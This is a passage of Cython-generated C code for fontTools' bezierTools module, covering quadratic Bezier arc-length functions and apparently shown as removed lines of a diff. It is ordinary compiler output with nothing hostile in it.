__Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyFloat_FromDouble((pow(__pyx_v_x, 2.0) + 1.0)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_3}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - 
__Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyInt_TrueDivideObjC(__pyx_t_4, __pyx_int_2, 2, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_math); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asinh); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyFloat_FromDouble(__pyx_v_x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_1}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyInt_TrueDivideObjC(__pyx_t_4, __pyx_int_2, 2, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 148, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_7 = __pyx_PyFloat_AsDouble(__pyx_t_4); if (unlikely((__pyx_t_7 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_7; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":141 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools._intSecAtan", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = -1; - __pyx_L0:; - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength, "calcQuadraticArcLength(pt1, pt2, pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> calcQuadraticArcLength((0, 0), (0, 0), (0, 0)) # empty segment\n 0.0\n >>> calcQuadraticArcLength((0, 0), (50, 0), (80, 0)) # collinear points\n 80.0\n >>> calcQuadraticArcLength((0, 0), (0, 50), (0, 80)) # collinear points vertical\n 80.0\n >>> calcQuadraticArcLength((0, 0), (50, 20), (100, 40)) # collinear points\n 107.70329614269008\n >>> calcQuadraticArcLength((0, 0), (0, 100), (100, 0))\n 154.02976155645263\n >>> calcQuadraticArcLength((0, 0), (0, 50), (100, 0))\n 120.21581243984076\n >>> calcQuadraticArcLength((0, 0), (50, -10), (80, 50))\n 102.53273816445825\n >>> calcQuadraticArcLength((0, 0), (40, 0), (-40, 0)) # collinear points, control point outside\n 66.66666666666667\n >>> calcQuadraticArcLength((0, 0), (40, 0), (0, 0)) # collinear points, looping back\n 40.0\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength = {"calcQuadraticArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t 
__pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 
3, 1); __PYX_ERR(0, 151, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 3, 2); __PYX_ERR(0, 151, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticArcLength") < 0)) __PYX_ERR(0, 151, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLength", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 151, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - 
__Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticArcLength", 1); - - /* "fontTools/misc/bezierTools.py":183 - * 40.0 - * """ - * return calcQuadraticArcLengthC(complex(*pt1), complex(*pt2), complex(*pt3)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 183, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC, "calcQuadraticArcLengthC(double complex pt1, double complex pt2, double complex pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a complex number.\n pt2: Handle point of the Bezier as a complex number.\n pt3: End point of the Bezier as a complex number.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC = {"calcQuadraticArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex 
__pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, 1); __PYX_ERR(0, 186, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if 
(likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, 2); __PYX_ERR(0, 186, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticArcLengthC") < 0)) __PYX_ERR(0, 186, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 186, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(__pyx_self, 
__pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3) { - double __pyx_v_scale; - double __pyx_v_origDist; - double __pyx_v_a; - double __pyx_v_b; - double __pyx_v_x0; - double __pyx_v_x1; - double __pyx_v_Len; - __pyx_t_double_complex __pyx_v_d0; - __pyx_t_double_complex __pyx_v_d1; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_n; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - double __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - double __pyx_t_6; - double __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":218 - * # Analytical solution to the length of a quadratic bezier. 
- * # Documentation: https://github.com/fonttools/fonttools/issues/3055 - * d0 = pt2 - pt1 # <<<<<<<<<<<<<< - * d1 = pt3 - pt2 - * d = d1 - d0 - */ - __pyx_v_d0 = __Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1); - - /* "fontTools/misc/bezierTools.py":219 - * # Documentation: https://github.com/fonttools/fonttools/issues/3055 - * d0 = pt2 - pt1 - * d1 = pt3 - pt2 # <<<<<<<<<<<<<< - * d = d1 - d0 - * n = d * 1j - */ - __pyx_v_d1 = __Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt2); - - /* "fontTools/misc/bezierTools.py":220 - * d0 = pt2 - pt1 - * d1 = pt3 - pt2 - * d = d1 - d0 # <<<<<<<<<<<<<< - * n = d * 1j - * scale = abs(n) - */ - __pyx_v_d = __Pyx_c_diff_double(__pyx_v_d1, __pyx_v_d0); - - /* "fontTools/misc/bezierTools.py":221 - * d1 = pt3 - pt2 - * d = d1 - d0 - * n = d * 1j # <<<<<<<<<<<<<< - * scale = abs(n) - * if scale == 0.0: - */ - __pyx_v_n = __Pyx_c_prod_double(__pyx_v_d, __pyx_t_double_complex_from_parts(0, 1.0)); - - /* "fontTools/misc/bezierTools.py":222 - * d = d1 - d0 - * n = d * 1j - * scale = abs(n) # <<<<<<<<<<<<<< - * if scale == 0.0: - * return abs(pt3 - pt1) - */ - __pyx_v_scale = __Pyx_c_abs_double(__pyx_v_n); - - /* "fontTools/misc/bezierTools.py":223 - * n = d * 1j - * scale = abs(n) - * if scale == 0.0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - */ - __pyx_t_1 = (__pyx_v_scale == 0.0); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":224 - * scale = abs(n) - * if scale == 0.0: - * return abs(pt3 - pt1) # <<<<<<<<<<<<<< - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyFloat_FromDouble(__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1))); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":223 - * n = d * 1j - * scale = abs(n) - * if scale == 0.0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * origDist = _dot(n, 
d0) - */ - } - - /* "fontTools/misc/bezierTools.py":225 - * if scale == 0.0: - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) # <<<<<<<<<<<<<< - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_n, __pyx_v_d0); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 225, __pyx_L1_error) - __pyx_v_origDist = __pyx_t_3; - - /* "fontTools/misc/bezierTools.py":226 - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: # <<<<<<<<<<<<<< - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - */ - __pyx_t_2 = PyFloat_FromDouble(fabs(__pyx_v_origDist)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyObject_RichCompare(__pyx_t_2, __pyx_t_4, Py_LT); __Pyx_XGOTREF(__pyx_t_5); if 